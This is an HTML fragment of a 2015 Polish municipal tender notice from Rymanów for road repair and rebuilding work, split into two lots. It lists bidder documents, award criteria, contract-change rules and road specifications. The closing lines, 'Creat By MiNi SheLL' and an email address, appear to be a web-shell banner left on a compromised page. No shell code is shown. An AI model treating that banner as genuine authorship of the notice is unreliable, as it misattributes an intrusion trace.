<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony formularz ofertowy - Załącznik nr 1 do SIWZ
2) Dowód wniesienia wadium.
3) W przypadku, gdy Wykonawca składa ofertę równoważną zobowiązany jest dołączyć do oferty dodatkowe dokumenty informujące o zastosowaniu równoważnych materiałów, usług lub robót oraz o ich parametrach technicznych i jakościowych (dotyczy tylko i wyłącznie Wykonawców oferujących materiały i/lub urządzenia  równoważne).
4) Pełnomocnictwo (jeśli dotyczy).
5) Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin wykonania zamówienia - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany postanowień zawartej umowy możliwe będą do dokonania jedynie na podstawie postanowień zawartych w treści niniejszej umowy, za zgodą obu Stron w formie pisemnego aneksu do umowy, pod rygorem nieważności takiej zmiany.
2. Nieważne z mocy ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych, są istotne zmiany w niniejszej umowie w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem warunków wymienionych w treści niniejszej umowy.
3. Zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, możliwe będą do dokonania na warunkach przewidzianych i określonych w specyfikacji istotnych warunków zamówienia i w treści niniejszej umowy, tj. w niżej wymienionych przypadkach:
1) 	Termin realizacji zamówienia może być zmieniony w przypadku, gdy opóźnienie w wykonaniu przedmiotu umowy spowodowane będzie okolicznością, która wystąpiła z przyczyn niezależnych od Wykonawcy po zawarciu umowy: 
a) gdy zajdzie konieczność wykonania robót dodatkowych lub zamiennych, które będą niezbędne do prawidłowego wykonania i zakończenia robót objętych umową podstawową,  (jeżeli zajdzie taka konieczność),
b) wystąpienie warunków pogodowych mających wpływ na niemożność prowadzenia prac budowlanych jak: długotrwałe intensywne opady trwające, powódź , wczesny okres zimowy, opady śniegu, silny mróz uniemożliwiający układanie rurociągu. 
W opisanych przypadkach termin wykonania zostanie przedłuży o ilość dni, w których nie można było prowadzić robót,
              c) Wystąpienie okoliczności powodujących konieczność opracowania oraz uzyskania 
              dodatkowych materiałów niezbędnych do prawidłowego zakończenia zadania (np. 
              decyzja pozwolenia na budowę/zgłoszenia w zakresie koniecznych zmian), dotyczy to 
              również opracowania dodatkowej lub zamiennej dokumentacji projektowej w przypadku  
              wystąpienia takiej konieczności z powodu wad lub braków dostarczonej przez  
              Zamawiającego dokumentacji,
d) Wstrzymania robót spowodowanego wykryciem np. niewybuchów, niewypałów, wykopalisk archeologicznych, pozostałości budowli podziemnych, 
e) Wystąpienia niezgodności map geodezyjnych ze stanem faktycznym, 
f) Wstrzymania robót budowlanych przez organy administracji publicznej, 
g) zmiany zakresu rzeczowego zamówienia, gdy ze względów społecznych, gospodarczych w trakcie trwania realizacji inwestycji wystąpią okoliczności powodujące, że niecelowym jest wykonanie pełnego zakresu robót zgodnie z dokumentacją projektową.  
W przypadku wystąpienia wyżej wymienionych przypadków, termin wykonania zadania zostanie przedłużony o ilość dni, w których nie można było rozpocząć lub prowadzić robót.
      2)    Zamawiający dopuszcza za zgodą Wykonawcy robót zmianę wartości i zakresu  
               wykonanych robót  w przypadku zwiększenia  lub zmniejszenia środków finansowych w 
               trakcie realizacji umowy. 
      3)     Zamawiający dopuszcza możliwość skrócenia terminu płatności faktury końcowej w 
               przypadku zmiany terminu wykonania przedmiotu umowy lub wystąpienia robót 
               dodatkowych warunkujących wykonanie umowy na zamówienie podstawowe i w celu  
               zapłacenia faktury w roku budżetowym, w którym umowa jest  realizowana. 
2) Dopuszcza się za zgodą Projektanta zmianę sposobu wykonania poszczególnych robót 
         przy zachowaniu parametrów oraz możliwość zmiany kwoty wynagrodzenia w 
         przypadku zastosowania materiałów zamiennych, innych technologii lub rozwiązań, gdy  
         zmiana taka jest korzystna dla Zamawiającego, nie spowoduje wzrostu kosztów   
         inwestycji lub wpłynie na przyspieszenie terminu zakończenia robót budowlanych. 
      5)    Zamawiający dopuszcza możliwość zmiany osób Kierownika budowy i Kierowników 
              robót na wniosek Wykonawcy i tylko w sytuacji nieprzewidzianej (np. rozwiązanie 
              stosunku pracy) oraz zdarzenia losowego np. choroby, śmierci itp. Jeżeli zajdzie 
              konieczność wprowadzenia takiej zmiany Zamawiający żąda dokumentów kandydata na 
              stanowisko Kierownika budowy lub Kierownika robót, z których jednoznacznie musi  
              wynikać, że osoba ta spełnia warunki udziału jakie były określone dla tego postępowania 
              o udzielenie zamówienia publicznego. 
       6)   Poza przypadkami określonymi powyżej, istotne zmiany postanowień zawartej umowy 
              będą mogły nastąpić w razie zaistnienia, po zawarciu umowy: 
              a) przypadku siły wyższej, 
              b) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na 
              realizację przedmiotu zamówienia, w tym również zmiany stawki podatku VAT. 
4.    Pozostałe zmiany. 
      1)   Zamawiający dopuszcza zastosowanie innych rozwiązań technicznych, technologicznych, 
             innych materiałów niż przewidziane w dokumentacji pod warunkiem, że: 
             a) Zamienne materiały będą miały lepsze parametry techniczne, bez pogorszenia 
             warunków eksploatacyjnych, 
             b) Zmiany te spowodują obniżenie kosztów na eksploatację i konserwację wykonanego 
             przedmiotu umowy bez pogorszenia parametrów technicznych materiałów, 
c) Wynikać będą z konieczności usunięcia błędów w dokumentacji lub realizacji 
             przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych, technologicznych 
             lub materiałowych niż przewidziane w dokumentacji. Przyjęte w dokumentacji materiały 
            są niedostępne na rynku, zostały wycofane z produkcji. 
      2)  Rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. Zamawiający 
             zastrzega sobie prawo do niezrealizowania pełnego zakresu robót, w sytuacji której nie 
             można było przewidzieć w chwili zawarcia umowy, a nie powstałej z winy  
             Zamawiającego ani Wykonawcy, maksymalnie do wysokości 20% wartości umowy bez  
             żadnych negatywnych skutków prawnych i finansowych. W takim przypadku 
             wynagrodzenie Wykonawcy zostanie pomniejszone i termin realizacji skrócony, przy 
             czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane 
             koszty, które Wykonawca poniósł w związku wynikającymi z umowy planowanymi 
             świadczeniami. 
5.     Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może 
         wyrazić zgodę. Nie stanowią one jednak zobowiązania do wyrażenia takiej zgody. 
6.     Zmiany w rozumieniu art. 144 ustawy Prawo Zamówień Publicznych nie stanowią: 
        1)  Zmiany danych związanych z obsługą organizacyjno - administracyjną np. zmiana kont 
         bankowych, procedur związanych z uregulowaniem płatności wobec Podwykonawców, 
         2) Zmiany osób wskazanych w umowie do kontaktów między Stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rymanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Rymanowie, ul. Mitkowskiego 14a, 38-480 Rymanów - pok. 215.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2015 godzina 10:00, miejsce: Urząd Gminy w Rymanowie, ul. Mitkowskiego 14a, 38-480 Rymanów - Biuro Obsługi - pok. 101.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont drogi na dz. nr ewid. 894 w Króliku Polskim w km 0+700 - 1+700; 1000 mb x 3,00 m..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> harakterystyczne parametry: 
- Długość (jezdni) - 1000,00 mb, 
- Szerokość jezdni - 3,00 m 
- Przekrój poprzeczny jezdni - zachowanie istniejącego przekroju jednostronnego w kierunku do istniejącego rowu przydrożnego o spadku 2 % na odcinkach prostych a o spadku 3 % na łukach kołowych. 
- Przekrój podłużny/niweleta drogi - niewielka korekta istniejącej trasy niwelety celem zachowania płynności jezdni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.30-1, 45.23.33.20-8, 45.23.32.20-7, 45.11.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa i remont bieżący dróg na terenie Gminy Rymanów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Remont gminnej drogi dojazdowej wraz gminnym placem manewrowym w m. Bałucianka - na działce  o nr ewid. 174/3, 174/7. 
Charakterystyczne parametry:
- Długość (jezdni) - łącznie - 68,50 mb,
- Szerokość jezdni - od 2,75 m do 7,00 m,
- Przekrój poprzeczny jezdni - zachowanie istniejącego przekroju jednostronnego o spadku ~      2 % na odcinkach prostych a o spadku ~ 3 % na łukach kołowych,
- Przekrój podłużny/niweleta drogi - niewielka korekta istniejącej trasy niwelety celem zachowania płynności jezdni.
b) Przebudowa gminnej drogi dojazdowej - w m. Bzianka na działkach o nr ewid. gr 918 i 802
Charakterystyczne parametry: 
- Długość (jezdni) - 287,00 mb
- Szerokość jezdni - 2,75 m
- Przekrój poprzeczny jezdni - zachowanie istniejącego przekroju dwustronnego (daszkowego) o spadku ~ 2 % na odcinkach
prostych a o spadku jednostronnym ~ 3 % na łukach kołowych.
- Przekrój podłużny/niweleta drogi - korekta istniejącej trasy niwelety celem zachowania płynności jezdni,
- Wody opadowe (deszczowe) z jezdni drogi odprowadzane (spływają z jezdni drogi) naturalnie/topograficznie wzdłuż niwelety drogi w granicach pasa drogowego.
c) Przebudowa gminnej drogi dojazdowej - w m. Sieniawa na działce o nr ewid. gr. 1216
Charakterystyczne parametry: 
- Długość (jezdni) - 80,00 mb 
- Szerokość jezdni - 2,75 m 
- Przekrój poprzeczny jezdni - zachowanie istniejącego przekroju dwustronnego (daszkowego) o spadku ~ 2 % na odcinkach prostych a o spadku jednostronnym ~ 3 % na łukach kołowych. 
- Przekrój podłużny/niweleta drogi - korekta istniejącej trasy niwelety celem zachowania płynności jezdni. 
- Wody opadowe (deszczowe) z jezdni drogi odprowadzane (spływają z jezdni drogi) naturalnie/topograficznie wzdłuż niwelety drogi w granicach pasa drogowego. 
d) Przebudowa gminnej drogi dojazdowej - w m. Królik Polski na działce o nr ewid. gr. 713 
Charakterystyczne parametry: 
- Długość (jezdni) - 142,00 mb, 
- Szerokość jezdni - 2,75 m, 
- Przekrój poprzeczny jezdni - zachowanie istniejącego przekroju dwustronnego (daszkowego) o spadku ~ 2 % na odcinkach prostych a o spadku jednostronnym ~ 3 % na łukach kołowych,
- Przekrój podłużny/niweleta drogi - korekta istniejącej trasy niwelety celem zachowania płynności jezdni,
- Wody opadowe (deszczowe) z jezdni drogi odprowadzane (spływają z jezdni drogi) naturalnie/topograficznie wzdłuż niwelety drogi w granicach pasa drogowego. 
e) Przebudowa gminnej drogi dojazdowej - w m. Rymanów na działce o nr ewid. gr. 3141/15 oraz w m. Posada Górna na działce o nr ewid. gr. 32. 
Charakterystyczne parametry: 
- Długość (jezdni) - 290,00 mb,
- Szerokość jezdni - do 2,75 m, 
- Przekrój poprzeczny jezdni - zachowanie istniejącego przekroju dwustronnego (daszkowego) o spadku ~ 2 % na odcinkach prostych a o spadku jednostronnym ~ 3 % na łukach kołowych,
- Przekrój podłużny/niweleta drogi - korekta istniejącej trasy niwelety celem zachowania płynności jezdni,
- Wody opadowe (deszczowe) z jezdni drogi odprowadzane (spływają z jezdni drogi) naturalnie/topograficznie wzdłuż niwelety drogi w granicach pasa drogowego. 
f) Przebudowa gminnej drogi dojazdowej ul. Dębowa - w m. Rymanów Zdrój na działce o nr ewid. gr. 361. 
Charakterystyczne parametry: 
- Długość (jezdni) - ~ 70,00 mb,
- Szerokość jezdni - od 9,40 m do 4,75 m,
- Przekrój poprzeczny jezdni - zachowanie istniejącego przekroju dwustronnego (daszkowego) o spadku ~ 2 % na odcinkach prostych a o spadku jednostronnym ~ 1 % w kierunku istniejącego ścieku liniowego przykrawężnikowego na odcinku ścieku przykrawężnikowego,
- Przekrój podłużny/niweleta drogi - korekta istniejącej trasy niwelety celem zachowania płynności jezdni,
- Wody opadowe (deszczowe) z jezdni drogi odprowadzane (spływają z jezdni drogi) naturalnie/topograficznie wzdłuż niwelety drogi w granicach pasa drogowego do istniejących drogowych kratek ściekowych kanalizacji deszczowej (poprzez spadek) oraz częściowo poprzez istniejący ściek liniowy przykrawężnikowy. 
 g) Przebudowa gminnej drogi dojazdowej - w m. Sieniawa - ul. Długa na działce o nr ewid. gr 1168. 
Charakterystyczne parametry: 
- Długość (jezdni) - 392,00 mb, 
- Szerokość jezdni - 3,00 m, 
- Przekrój poprzeczny jezdni - zachowanie istniejącego przekroju dwustronnego (daszkowego) o spadku ~ 2 % na odcinkach prostych a o spadku jednostronnym ~ 3 % na łukach kołowych,
- Przekrój podłużny/niweleta drogi - korekta istniejącej trasy niwelety celem zachowania płynności jezdni,
- Wody opadowe (deszczowe) z jezdni drogi odprowadzane (spływają z jezdni drogi) naturalnie/topograficznie wzdłuż niwelety drogi w granicach pasa drogowego. 
h) Przebudowa gminnej drogi dojazdowej - w m. Wróblik Szlachecki na działkach o nr ewid. gr 568/7 i 1564.
Charakterystyczne parametry: 
- Długość (jezdni) - 365,00 mb, 
- Szerokość jezdni - 3,00 m,
- Przekrój poprzeczny jezdni - zachowanie istniejącego przekroju dwustronnego (daszkowego) o spadku ~ 2 % na odcinkach prostych a o spadku jednostronnym ~ 3 % na łukach kołowych,
- Przekrój podłużny/niweleta drogi - korekta istniejącej trasy niwelety celem zachowania płynności jezdni,
- Wody opadowe (deszczowe) z jezdni drogi odprowadzane (spływają z jezdni drogi) naturalnie/topograficznie wzdłuż niwelety drogi w granicach pasa drogowego. 
i) Remont fragmentaryczny istniejącego odcinka drogi gminnej ul. Nadbrzeżnej w Posadzie Górnej w ramach bieżącego utrzymania dróg (odcinek od szkoły w kierunku Rymanowa
Charakterystyczne parametry: 
- Przybliżona sumaryczna powierzchnia - 1.513,50 m2, 
- Przybliżona długość - ~ 406,00 mb + 4 wjazdy, 
- Szerokość jezdni - zachowanie istniejącej ~ 3,30 m, 
- Przekrój poprzeczny jezdni - zachowanie istniejącego przekroju, 
- Przekrój podłużny/niweleta drogi - zachowanie istniejącego spadku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.30-1, 45.23.33.20-8, 45.23.32.20-7, 45.11.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania zamówienia - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com